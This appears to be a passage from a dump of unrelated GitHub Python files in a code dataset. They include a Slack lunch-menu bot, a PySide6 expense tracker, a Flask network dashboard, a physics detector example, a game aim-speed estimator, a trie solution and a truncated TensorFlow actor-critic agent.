slack\")\n\nparser.add_argument(\n \"-wp\",\n action='store_true',\n help=\"display only dishes with price\")\n\nargs = parser.parse_args()\n\n\nclass Slack:\n\n def __init__(self):\n if args.s:\n self.hook_link = get_data_from_token(\"slack-web-hook-link\")\n\n def post(self, menus):\n for menu in menus:\n post_data = {\"text\": menu}\n if args.s:\n data = json.dumps(post_data, ensure_ascii=False).encode('utf8')\n requests.post(self.hook_link, data=data)\n else:\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(json.dumps(post_data))\n\n\nclass Zomato:\n\n def __init__(self):\n self.token = get_data_from_token(\"zomato-token\")\n\n def get_daily_dishes(self, res_id, name):\n payload = {'res_id': res_id}\n headers = {'user_key': self.token}\n r = requests.get(\n \"https://developers.zomato.com/api/v2.1/dailymenu\",\n params=payload,\n headers=headers)\n if r.status_code == requests.codes.ok:\n dishes = r.json()[\"daily_menus\"][0][\"daily_menu\"][\"dishes\"]\n if args.wp:\n dishes = list(filter(\n lambda x: len(x[\"dish\"][\"price\"]) > 0,\n dishes))\n return self.format_data(dishes, name)\n else:\n return self.no_daily_menu(name)\n\n def format_data(self, data, restaurant_name):\n dishes = \"*\" + restaurant_name + \"*\" + \"\\n\"\n for dish in data:\n dishes += dish[\"dish\"][\"name\"] + \"\\n\"\n return dishes\n\n def no_daily_menu(self, restaurant_name):\n dishes = \"*\" + restaurant_name + \"*\" + \"\\n\"\n dishes += \"no daily menu\"\n return dishes\n\n def read_restaurants(self):\n with open('restaurants.json', encoding=\"utf-8\") as restaurants_file:\n restaurants = json.load(restaurants_file)\n return restaurants\n\n\ndef get_data_from_token(id):\n with open('config.json', encoding=\"utf-8\") as tokens_file:\n tokens_json = json.load(tokens_file)\n token = tokens_json[id]\n return token\n\n\nzom = Zomato()\n\nmenus = list()\n\nfor restaurant in zom.read_restaurants():\n rest_id = restaurant[\"id\"]\n rest_name = restaurant[\"name\"]\n menus.append(zom.get_daily_dishes(rest_id, rest_name))\n\nslack = Slack()\nslack.post(menus)\n","repo_name":"AquaSoup/slackfood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34877907079","text":"import sys\n# import datetime\nfrom datetime import datetime as dt\nfrom datetime import timedelta\n\nimport yfinance as yf\nimport yahoo_fin.stock_info as si\nfrom PySide6 import QtWidgets\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtSql import QSqlTableModel\nfrom currency_converter import CurrencyConverter\n\nfrom connection import Data\nfrom main_form import Ui_MainWindow\nfrom NewTransaction import Ui_Dialog\nfrom Currency import Ui_Dialog as Ui_Currency\nfrom portfolio_meneger import Ui_Dialog as Ui_Portfolio\n\n\nclass ExpenseTracker(QMainWindow):\n def __init__(self):\n super(ExpenseTracker, self).__init__()\n self.new_window = None\n self.model = None\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.init_ui()\n self.conn = Data()\n\n def init_ui(self):\n self.ui.ButtonConverter.clicked.connect(self.open_converter)\n self.ui.Button_NewTransaction.clicked.connect(self.open_new_transaction_window)\n self.ui.PortfolioMeneger.clicked.connect(self.open_portfolio_window)\n\n def open_new_transaction_window(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = Ui_Dialog()\n self.ui_window.setupUi(self.new_window)\n self.new_window.show()\n\n def open_converter(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = Ui_Currency()\n self.ui_window.setupUi(self.new_window)\n\n self.ui_window.input_currency.setText(\"USD\")\n self.ui_window.output_currency.setText(\"RUB\")\n self.ui_window.input_amount.setText(\"100\")\n self.new_window.show()\n self.ui_window.ButtonConvert.clicked.connect(self.convert)\n\n def open_portfolio_window(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = Ui_Portfolio()\n self.ui_window.setupUi(self.new_window)\n self.ui_window.button_show_allocation.clicked.connect(self.show_allocation)\n self.ui_window.button_add_new_share.clicked.connect(self.add_new_share)\n\n self.new_window.show()\n\n def convert_CC(self):\n conv = CurrencyConverter()\n input_currency = self.ui_window.input_currency.text()\n output_currency = self.ui_window.output_currency.text()\n input_amount = int(self.ui_window.input_amount.text())\n date_time_str = self.ui_window.dateEdit.text()\n date_time_obj = dt.strptime(date_time_str, '%d.%m.%Y')\n # output_amount = conv.convert(input_amount, '%s' % (input_currency), '%s' % (output_currency), date_time_obj)\n output_amount = conv.convert(input_amount, input_currency, output_currency, date_time_obj)\n self.ui_window.output_amount.setText(str(output_amount))\n\n def convert(self):\n # yahoofin\n input_currency = self.ui_window.input_currency.text()\n output_currency = self.ui_window.output_currency.text()\n input_amount = int(self.ui_window.input_amount.text())\n date_time_str = self.ui_window.dateEdit.text()\n date_time_obj = dt.strptime(date_time_str, '%d.%m.%Y')\n # construct the currency pair symbol\n symbol = f\"{input_currency}{output_currency}=X\"\n latest_data = si.get_data(symbol, interval=\"1d\", start_date=date_time_obj+timedelta(days=-2), end_date=date_time_obj)\n latest_price = latest_data.iloc[-1].close\n\n output_amount = latest_price * input_amount\n self.ui_window.output_amount.setText(str(output_amount))\n\n def show_allocation(self):\n self.update_all_prices()\n self.conn.update_percentages()\n\n self.model = QSqlTableModel(self)\n self.model.setTable('portfolio')\n self.model.select()\n self.ui_window.tableView.setModel(self.model)\n\n def add_new_share(self):\n share = self.ui_window.Share.text()\n quantity = int(self.ui_window.Quantity.text())\n self.conn.add_new_share_query(share, quantity, 10)\n self.show_allocation()\n\n def update_all_prices(self):\n shares = self.conn.get_all_shares()\n\n today_data = dt.today()\n today_str = today_data.strftime(\"%Y-%m-%d\")\n start_data = today_data + timedelta(days=-10)\n start_str = start_data.strftime(\"%Y-%m-%d\")\n\n for ticker in shares:\n data = yf.download(ticker, start_str, today_str)['Adj Close']\n if data.empty:\n continue\n\n # надо брать последнюю цену, а запрос не возвращает предыдущую цену\n # если запросить только одну дату и на нее не окажется цены\n price = data[data.size - 1]\n self.conn.update_price(ticker, float(price))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = ExpenseTracker()\n window.show()\n\n sys.exit(app.exec())\n","repo_name":"brava05/FamilyExpenses","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8473149440","text":"import numpy, wave, array\nimport os\n\nDOWNLOADE_DIR = os.path.dirname(os.path.abspath(__file__)) + '/wav_output/'\n\ndef create_wavefile(filename,data):\n filename = DOWNLOADE_DIR + filename + \".wav\"\n\n # save wav file\n buf = data\n w = wave.Wave_write(filename)\n w.setparams((\n 1, # channel\n 2, # byte width\n 16000, # sampling rate\n len(buf), # number of frames\n \"NONE\", \"not compressed\" # no compression\n ))\n w.writeframes(array.array('h', buf).tostring())\n w.close()\n\n return\n","repo_name":"KaijiS/Cut_Vowel","sub_path":"upload_form/vowel_cut/create_wav.py","file_name":"create_wav.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1324676183","text":"from flask import Flask, render_template, jsonify, request\r\nimport ipPublique\r\nimport ping3\r\nimport main\r\nimport subprocess\r\n\r\n\r\nping_target = \"1.1.1.1\"\r\napp = Flask(__name__)\r\n# default page\r\n@app.route('/')\r\ndef home():\r\n latency = round(ping3.ping(ping_target, unit='ms'),2)\r\n return render_template('index.html', variable=ipPublique.public_ip, latency=latency , hostname=ping_target, nmap=main.hosts)\r\n\r\n\r\n# -------------------------------API------------------------------------\r\n# PING api request\r\n# @app.route('/ping', methods=['POST'])\r\n# def ping():\r\n# try:\r\n# latency = round(ping3.ping(ping_target, unit='ms'),2)\r\n# print(\"PINGED\")\r\n# return jsonify(latency)\r\n# except Exception as e:\r\n# return str(e)\r\n\r\n# Restart api request\r\n@app.route('/restart_vm', methods=['POST'])\r\ndef restart_vm():\r\n vm_ip = '192.168.116.196'\r\n command = f\"sudo reboot {vm_ip}\" \r\n subprocess.call(command, shell=True)\r\n return \"La SemaBox a été redémarrée avec succès !\"\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True,host='0.0.0.0', port='5000')","repo_name":"aurelien-vanbelle/public","sub_path":"SemaBox/src/flask SemaLynx/Site.py","file_name":"Site.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71447473823","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport psana\nfrom time import time\nfrom Detector.GlobalUtils import print_ndarr\n\n##-----------------------------\n\nntest = int(sys.argv[1]) if len(sys.argv)>1 else 1\nprint('Test # %d' % ntest)\n\n##-----------------------------\n\ndsname, src = 'exp=cxii8715:run=15', 'CxiEndstation.0:Quartz4A150.0' # or alias='Sc1Questar'\nprint('Example for\\n dataset: %s\\n source : %s' % (dsname, src))\n\n#psana.setOption('psana.calib-dir', './calib')\n\nds = psana.DataSource(dsname)\nevt = next(ds.events())\nenv = ds.env()\nnrun = evt.run()\n\nfor key in evt.keys() : print(key)\n\n##-----------------------------\nfrom Detector.AreaDetector import AreaDetector\n\npar = nrun # evt or nrun\ndet = AreaDetector(src, env, pbits=0, iface='P') # iface='P' or 'C'\n\nins = det.instrument()\nprint(80*'_', '\\nInstrument: ', ins)\n#det.set_print_bits(511);\n#det.set_def_value(-5.);\n#det.set_mode(1);\n#det.set_do_offset(True); # works for ex. Opal1000\n\n#det.print_attributes()\n\n#shape_nda = det.shape(par)\n#print_ndarr(shape_nda, 'shape of ndarray')\n\n#print('size of ndarray: %d' % det.size(par))\n#print('ndim of ndarray: %d' % det.ndim(par))\n\n#peds = det.pedestals(par)\n#print_ndarr(peds, 'pedestals')\n\n#rms = det.rms(par)\n#print_ndarr(rms, 'rms')\n\n#mask = det.mask(par)\n#print_ndarr(mask, 'mask')\n\n#gain = det.gain(par)\n#print_ndarr(gain, 'gain')\n\n#bkgd = det.bkgd(par)\n#print_ndarr(bkgd, 'bkgd')\n\n#status = det.status(par)\n#print_ndarr(status, 'status')\n\n#status_mask = det.status_as_mask(par)\n#print_ndarr(status_mask, 'status_mask')\n\n#cmod = det.common_mode(par)\n#print_ndarr(cmod, 'common_mod')\n\nt0_sec = time()\nnda_raw = det.raw(evt)\nprint_ndarr(nda_raw, 'nda_raw')\n\ni=0\nif nda_raw is None :\n for i, evt in enumerate(ds.events()) :\n nda_raw = det.raw(evt)\n if nda_raw is not None :\n print('Detector data found in event %d' % i)\n break\n\nprint_ndarr(nda_raw, 'raw data')\n\nif nda_raw is None :\n print('Detector data IS NOT FOUND in %d events' % i)\n sys.exit('FURTHER TEST IS TERMINATED')\n\n##-----------------------------\n\n#if peds is not None and nda_raw is not None : peds.shape = nda_raw.shape \n\n#data_sub_peds = nda_raw - peds if peds is not None else nda_raw\n#print_ndarr(data_sub_peds, 'data - peds')\n\n#nda_cdata = det.calib(evt)\n#print_ndarr(nda_cdata, 'calibrated data')\n\n#nda_cdata_ub = det.calib(evt, cmpars=(5,50))\n#print_ndarr(nda_cdata_ub, 'calibrated data for cspad unbond pixels')\n\n#coords_x = det.coords_x(par)\n#print_ndarr(coords_x, 'coords_x')\n\n#areas = det.areas(par)\n#print_ndarr(areas, 'area')\n\n#mask_geo = det.mask_geo(par)\n#print_ndarr(mask_geo, 'mask_geo')\n\n#mask_geo.shape = (32,185,388)\n#print(mask_geo)\n\n\n#pixel_size = det.pixel_size(par)\n#print('%s\\npixel size: %s' % (80*'_', str(pixel_size)))\n\n##-----------------------------\nimg_arr = nda_raw\n#img_arr = data_sub_peds\n#img_arr = nda_cdata if nda_cdata is not None else nda_raw\nimg = None\n\n# Image producer is different for 3-d and 2-d arrays \nif len(nda_raw.shape) > 2 :\n #img = det.image(evt)\n img = det(evt) # alias for det.image(evt) implemented in __call__\n #img = det.image(evt, img_arr)\nelse :\n img = img_arr\n img.shape = nda_raw.shape\n\nprint_ndarr(img, 'image (calibrated data or raw)')\n\nprint(80*'_')\n\n##-----------------------------\n\nif img is None :\n print('Image is not available')\n sys.exit('FURTHER TEST IS TERMINATED')\n\nimport pyimgalgos.GlobalGraphics as gg\n\nave, rms = img.mean(), img.std()\ngg.plotImageLarge(img, amp_range=(ave-1*rms, ave+2*rms))\ngg.show()\n\n##-----------------------------\n\nsys.exit(0)\n\n##-----------------------------\n","repo_name":"lcls-psana/Detector","sub_path":"examples/ex_quartz.py","file_name":"ex_quartz.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"41826381755","text":"from aim_estimators import AimEstimator360, AimEstimatorPivot\nimport cv2 as cv\nfrom gimx_api import initGIMXConnection, sendAimSpeedCommand\nfrom time import sleep\nimport pandas as pd\nimport numpy as np\nimport os\nfrom cvutils import CroppedVideoCapture\n\n\ndef removeBuffer(vcap):\n for _ in range(8):\n vcap.grab()\n\n\nFPS = 60\n\n\ndef saveData(data, fpath):\n df = pd.DataFrame(data, columns=['x_axis', 'y_axis', 'x_speed'])\n df.to_csv(fpath, index=False)\n\n\ndef estimateSpeed(vcap, aim_estimator):\n fps = vcap.get(cv.CAP_PROP_FPS)\n assert(fps > 0), \"Could not get FPS property from video.\"\n degrees_persec = aim_estimator.estimateSpeed(vcap) * fps\n return degrees_persec\n\n\ndef estimateWithCaptureCard_auto(vid, xlist, ylist, aim_estimator, cropx=None, cropy=None):\n vcap = CroppedVideoCapture(cropx, cropy, vid)\n vcap.set(cv.CAP_PROP_FRAME_WIDTH, 1280)\n vcap.set(cv.CAP_PROP_FRAME_HEIGHT, 720)\n degrees_persec_list = []\n for x, y in zip(xlist, ylist):\n print(\"Estimating speed of (%d,%d)...\" % (x, y))\n sendAimSpeedCommand(x, y)\n sleep(0.5) # dealing with latency\n removeBuffer(vcap)\n # degrees_persec = estimateSpeed(vcap, aim_estimator)\n degrees_persec = aim_estimator.estimateSpeed(vcap) * FPS\n degrees_persec_list.append(degrees_persec)\n print(\"Estimated speed is: %f degrees per second\" % degrees_persec)\n vcap.release()\n return degrees_persec_list\n\n\ndef estimateVideoFile(video_files_list, aim_estimator, cropx=None, cropy=None):\n degrees_persec_list = []\n for vfile in video_files_list:\n assert(os.path.isfile(vfile)), \"File not found: %s\" % vfile\n vcap = CroppedVideoCapture(cropx, cropy, vfile)\n degrees_persec = estimateSpeed(vcap, aim_estimator)\n degrees_persec_list.append(degrees_persec)\n vcap.release()\n print(\"Estimated speed of %s is: %f degrees per second\" % (vfile, degrees_persec))\n return degrees_persec_list\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str, metavar='FILE',\n required=True, help=\"Video file or csv file with video files or video capture id.\")\n parser.add_argument('-o', '--output', type=str, metavar='FILE',\n default='data_estimated-speed.csv', help=\"output csv file\")\n parser.add_argument('-x', '--speeds-x', metavar='N', type=int, nargs='+',\n required=False, help='X speeds from -128 to 127', choices=range(-128, 128))\n parser.add_argument('-y', '--speeds-y', metavar='N', type=int, nargs='+',\n required=False, help='Y speeds from -128 to 127', choices=range(-128, 128))\n parser.add_argument('--gimx-server', type=str,\n help=\"format: IP_ADDRESS:PORT. This enables auto mode\")\n parser.add_argument('--crop', metavar='N', type=int, nargs=4,\n default=[100, 200, 100, 200],\n help='Crop video. Format: X1 X2 Y1 Y2. Example: --crop 200 320 480 600, will crop to box with top left coordinates (200,480) and bottom right (320,600).')\n parser.add_argument('--dont-crop', action='store_true')\n parser.add_argument('--pivot', type=str, help=\"Video file\")\n args = parser.parse_args()\n assert(args.speeds_x is None or (len(args.speeds_x) == len(args.speeds_y)))\n\n if(args.dont_crop):\n cropx = cropy = None\n else:\n crop = args.crop\n cropx = (crop[0], crop[1])\n cropy = (crop[2], crop[3])\n if(args.pivot is not None):\n assert(os.path.isfile(args.pivot)), \"File not found: %s\" % args.pivot\n vcap = CroppedVideoCapture(cropx, cropy, args.pivot)\n degrees_perframe = AimEstimator360().estimateSpeed(vcap)\n vcap.release()\n vcap = CroppedVideoCapture(cropx, cropy, args.pivot) # FIXME: Dont open twice\n aim_estimator = AimEstimatorPivot(vcap, degrees_perframe)\n vcap.release()\n else:\n aim_estimator = AimEstimator360()\n\n if(args.gimx_server is not None):\n gimx_ip, gimx_port = args.gimx_server.split(':')\n initGIMXConnection(gimx_ip, int(gimx_port))\n if(args.input[0].isdigit()):\n assert(len(args.speeds_x) >= 1), \"No speed x or y provided! See options --speed-x and --speed-y\"\n speeds_x = args.speeds_x\n speeds_y = args.speeds_y\n degrees_persec_list = estimateWithCaptureCard_auto(int(args.input), speeds_x, speeds_y,\n aim_estimator, cropx, cropy)\n else:\n if(args.input.endswith(\".csv\")):\n data = pd.read_csv(args.input, skipinitialspace=True)\n assert((data.columns == ['file name', 'x', 'y']).all()), 'Header of csv file should be \"file name,x,y\"'\n video_files = data['file name']\n assert(data['x'].dtype <= data['y'].dtype <= np.int64)\n speeds_x = data['x']\n speeds_y = data['y']\n else:\n # assert(len(args.speeds_x) >= 1), \"No speed x or y provided! See options --speed-x and --speed-y\"\n speeds_x = [None]\n speeds_y = [None]\n video_files = [args.input]\n degrees_persec_list = estimateVideoFile(video_files, aim_estimator, cropx, cropy)\n data = [(x, y, d) for x, y, d in zip(speeds_x, speeds_y, degrees_persec_list)]\n\n saveData(data, args.output)\n print(\"FINISHED!\")\n","repo_name":"Lucashsmello/console_aim_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14722767499","text":"class TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.sizes = 0\n self.is_end_of_word = False\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if node.children[index] is None:\n node.children[index] = TrieNode()\n node.sizes += 1\n node = node.children[index]\n node.is_end_of_word = True\n\n def search(self, word: str) -> bool:\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if node.children[index] is None:\n return False\n node = node.children[index]\n return node.is_end_of_word\n\n def searchLongest(self, word: str):\n ans = ''\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if( not node.children[index] \n or node.is_end_of_word\n or node.sizes > 1 ):\n return ans\n ans += c\n node = node.children[index]\n return ans\n\n def startsWith(self, prefix: str) -> bool:\n curr = self.root\n for c in prefix:\n index = ord(c) - ord('a')\n if curr.children[index] is None:\n return False\n curr = curr.children[index]\n return True \n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n if len(strs) == 0:\n return \"\"\n if len(strs) == 1:\n return strs[0]\n\n trie = Trie()\n for s in strs:\n trie.insert(s)\n\n return trie.searchLongest(strs[0])\n","repo_name":"Tranduchieu2002/leetcode_practice","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"15643998437","text":"import Sprite.utils as utils\nfrom Sprite.Spd.spd_sprite_entry import spd_sprite_entry\nfrom Sprite.Spr.spr_sprite_entry import spr_sprite_entry\nfrom Sprite.Spr.tmx import tmx\nimport os\nimport sys\n\ndef GenerateSpdSprite(dds_path, sprite_id, scale_multiplier):\n sprite = spd_sprite_entry()\n\n metadata = utils.read_dds_metadata(dds_path)\n\n sprite.sprite_id = sprite_id\n sprite.sprite_x_position = 0 \n sprite.sprite_y_position = 0 \n sprite.sprite_x_length = metadata[1]\n sprite.sprite_y_length = metadata[2]\n sprite.sprite_x_scale = int(metadata[1] / scale_multiplier)\n sprite.sprite_y_scale = int(metadata[2] / scale_multiplier)\n\n spd = open(os.path.splitext(dds_path)[0] + '.spdspr', 'wb')\n sprite.write(spd)\n spd.close()\n\ndef GenerateSprSprite(tmx_path, scale_multiplier):\n sprite = spr_sprite_entry()\n \n tmx_metadata = utils.read_tmx_metadata(tmx_path) \n\n sprite.sprite_x_position = 0 \n sprite.sprite_y_position = 0 \n sprite.sprite_x_length = int(tmx_metadata[1] / scale_multiplier)\n sprite.sprite_y_length = int(tmx_metadata[2] / scale_multiplier)\n\n spr = open(os.path.splitext(tmx_path)[0] + '.sprt', 'wb')\n sprite.write(spr)\n \nargs = sys.argv\ndel args[0]\n\nfor arg in args:\n if os.path.splitext(arg)[1].lower() == '.dds':\n GenerateSpdSprite(arg, int(input(f'input the id of the generated sprite: ')),\n int(input(f'input the sprite scale mulitplier (2 for p5rpc, 1 for every other version of p5/r): ')))\n elif os.path.splitext(arg)[1] == '.tmx':\n GenerateSprSprite(arg, int(input('input the sprite scale divisor (2 for p4gpc, 4 for p3ppc, 1 for psp/vita): '))) \n","repo_name":"Secre-C/PersonaSpriteTools","sub_path":"GenerateSpriteEntryFromTexture.py","file_name":"GenerateSpriteEntryFromTexture.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"74156336575","text":"from bs4 import BeautifulSoup\nimport requests\n\nhtml_text = requests.get('https://music.163.com/#/user/songs/rank?id=302036076').text\n\nsoup = BeautifulSoup(html_text, 'lxml')\n\nprint(html_text)\n\nsongs = soup.find_all('b')\n\nfor song in songs:\n print(song.text)\n\n\n","repo_name":"MasonSyj/SoftwareToolsPartI","sub_path":"scrape/songs.py","file_name":"songs.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42631218995","text":"class Node:\r\n def __init__(self,value):\r\n self.value = value\r\n self.next=None\r\n\r\n\r\nclass Pila:\r\n def __init__(self):\r\n self.height = 0\r\n\r\n def push(self,value):\r\n new_nodo=Node(value)\r\n if self.height==0:\r\n self.top=new_nodo\r\n else:\r\n new_nodo.next=self.top\r\n self.top=new_nodo\r\n\r\n self.height +=1\r\n return\r\n def print_stack(self):\r\n tem=self.top\r\n while tem is not None:\r\n print(tem.value)\r\n tem=tem.next\r\n return\r\n\r\n def pop(self):\r\n tem=self.top\r\n self.top=tem.next\r\n tem.next=None\r\n self.height+=1\r\n return tem.value\r\n\r\nmy_pila=Pila()\r\nmy_pila.push(1)\r\nmy_pila.push(2)\r\nmy_pila.push(3)\r\nmy_pila.print_stack()\r\nprint(\"----------------------------------\")\r\nmy_pila.pop()\r\nprint(\"----------------------------------\")\r\nprint(my_pila.top.value)\r\nprint(\"----------------------------------\")\r\nmy_pila.print_stack()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mauricio-Chavez/Pilas","sub_path":"Pila.py","file_name":"Pila.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20997808506","text":"import dash #creating a webpage\nimport dash_core_components as dcc #visual component\nimport dash_html_components as html\nimport plotly.graph_objs as go #employ graphics\nfrom dash.dependencies import Input, Output, State #calling the library\n\n\nlist_of_types=['Brick', 'Plate', 'Tile']\nlist_of_sizes=['1X2', '2X2', '2X4']\n\n\n########### Initiate the app (setting up html and css)\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) #for dash to get the url to display the css style sheet\nserver = app.server\napp.title='LEGO Pieces'\n\n########### Set up the layout\n\napp.layout = html.Div(children=[\n html.Br(),\n html.H3('Which LEGO piece you will choose?'),\n html.Div([\n html.Div([\n dcc.RadioItems(\n id='pick-a-type',\n options=[\n {'label':list_of_types[0], 'value':list_of_types[0]},\n {'label':list_of_types[1], 'value':list_of_types[1]},\n {'label':list_of_types[2], 'value':list_of_types[2]},\n ],\n value='choose',\n ),\n ],className='two columns'),\n html.Div([\n dcc.RadioItems(\n id='pick-a-size',\n options=[\n {'label':list_of_sizes[0], 'value':list_of_sizes[0]},\n {'label':list_of_sizes[1], 'value':list_of_sizes[1]},\n {'label':list_of_sizes[2], 'value':list_of_sizes[2]},\n ],\n value='lego',\n ),\n ],className='two columns'),\n html.Div([\n html.Div(id='your_output_here', children=''),\n ],className='eight columns'),\n ],className='twelve columns'),\n html.Br(),\n html.A('Code on Github', href='https://github.com/caroleonor/GAMid_project'),\n html.Br(),\n html.A(\"Data Source\", href='https://brickarchitect.com/book/bricks'),\n ]\n)\n\n########## Callback\n\n@app.callback(Output('your_output_here', 'children'),\n [Input('pick-a-type', 'value'),\n Input('pick-a-size', 'value')])\ndef radio_results(type_you_picked, size_you_picked):\n image_you_chose=f'{type_you_picked}-{size_you_picked}.jpg'\n return html.Img(src=app.get_asset_url(image_you_chose), style={'width': 'auto', 'height': 'auto'}),\n\n############ Deploy\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"caroleonor/GAMid_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20301862631","text":"# IMPORTING LIBRARIES\n\nimport sys\nIN_COLAB = \"google.colab\" in sys.modules\n\nimport gym\nimport numpy as np\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nfrom tensorflow.keras import Model\n\nfrom IPython.display import clear_output\n\nclass Actor(Model):\n def __init__(self, state_size: int, action_size: int, \n ):\n \"\"\"Initialization.\"\"\"\n super(Actor, self).__init__()\n \n self.state_size = state_size\n self.action_size = action_size\n # set the hidden layers\n self.layer1 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.layer2 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.policy = tf.keras.layers.Dense(self.action_size,activation='softmax')\n\n def call(self, state):\n layer1 = self.layer1(state)\n layer2 = self.layer2(layer1)\n policy = self.policy(layer2)\n return policy\n \nclass CriticV(Model):\n def __init__(\n self, \n state_size: int, \n ):\n \"\"\"Initialize.\"\"\"\n super(CriticV, self).__init__()\n self.layer1 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.layer2 = tf.keras.layers.Dense(hidden_size, activation='relu')\n self.value = tf.keras.layers.Dense(1, activation = None)\n\n def call(self, state):\n layer1 = self.layer1(state)\n layer2 = self.layer2(layer1)\n value = self.value(layer2)\n return value\n\nclass DQNAgent:\n \"\"\"A2CAgent interacting with environment.\n \n Attributes:\n env (gym.Env): openAI Gym environment\n gamma (float): discount factor\n entropy_weight (float): rate of weighting entropy into the loss function\n actor (tf.keras.Model): target actor model to select actions\n critic (tf.keras.Model): critic model to predict state values\n actor_optimizer (optim.Optimizer) : optimizer of actor\n critic_optimizer (optim.Optimizer) : optimizer of critic\n transition (list): temporory storage for the recent transition\n is_test (bool): flag to show the current mode (train / test)\n \"\"\"\n\n def __init__(\n self, \n env: gym.Env,\n ):\n \"\"\"Initialization.\n \n Args:\n env (gym.Env): openAI Gym environment\n gamma (float): discount factor\n \"\"\"\n \n # CREATING THE Q-Network\n self.env = env\n \n self.state_size = self.env.observation_space.shape[0]\n self.action_size = self.env.action_space.n\n \n self.actor_lr = 7e-3\n self.critic_lr = 7e-3\n self.gamma = 0.99 # discount rate\n self.actor = Actor(self.state_size, self.action_size\n )\n self.critic = CriticV(self.state_size\n )\n # self.a_opt = tf.keras.optimizers.RMSprop(learning_rate=1e-5)\n # self.c_opt = tf.keras.optimizers.RMSprop(learning_rate=1e-5)\n self.a_opt = tf.keras.optimizers.Adam(learning_rate=self.actor_lr)\n self.c_opt = tf.keras.optimizers.Adam(learning_rate=self.critic_lr)\n self.log_prob = None\n \n def get_action(self, state):\n prob = self.actor(np.array([state]))\n prob = prob.numpy()\n dist = tfp.distributions.Categorical(probs=prob, dtype=tf.float32)\n action = dist.sample()\n return int(action.numpy()[0])\n \n def actor_loss(self, prob, action, TDs):\n \n dist = tfp.distributions.Categorical(probs=prob, dtype=tf.float32)\n log_prob = dist.log_prob(action)\n loss = -log_prob*TDs\n return loss\n \n def n_step_td_target(self, states, actions, rewards, gamma):\n R_to_Go = 0\n discnt_rewards = []\n rewards.reverse()\n for r in rewards:\n R_to_Go = r + self.gamma*R_to_Go\n discnt_rewards.append(R_to_Go)\n discnt_rewards.reverse()\n states = np.array(states, dtype=np.float32)\n actions = np.array(actions, dtype=np.int32)\n discnt_rewards = np.array(discnt_rewards, dtype=np.float32)\n \n return states, actions, discnt_rewards\n \n def train_step(self, states, actions, discnt_rewards):\n discnt_rewards = tf.reshape(discnt_rewards, (len(discnt_rewards),))\n \n with tf.GradientTape() as tape1, tf.GradientTape() as tape2:\n \n curr_Ps = self.actor(states, training=True)\n curr_Qs = self.critic(states,training=True)\n curr_Qs = tf.reshape(curr_Qs, (len(curr_Qs),))\n \n TDs = tf.math.subtract(discnt_rewards, curr_Qs)\n \n critic_loss = 0.5 * kls.mean_squared_error(discnt_rewards, curr_Qs)\n actor_loss = self.actor_loss(curr_Ps, actions, TDs)\n \n actorGrads = tape1.gradient(actor_loss, self.actor.trainable_variables)\n criticGrads = tape2.gradient(critic_loss, self.critic.trainable_variables)\n self.a_opt.apply_gradients(zip(actorGrads, self.actor.trainable_variables))\n self.c_opt.apply_gradients(zip(criticGrads, self.critic.trainable_variables))\n \n return actor_loss, critic_loss\n\nseed = 1234\n# CREATING THE ENVIRONMENT\nenv_name = \"CartPole-v0\"\nenv = gym.make(env_name)\nenv.seed(seed) # reproducible, general Policy gradient has high 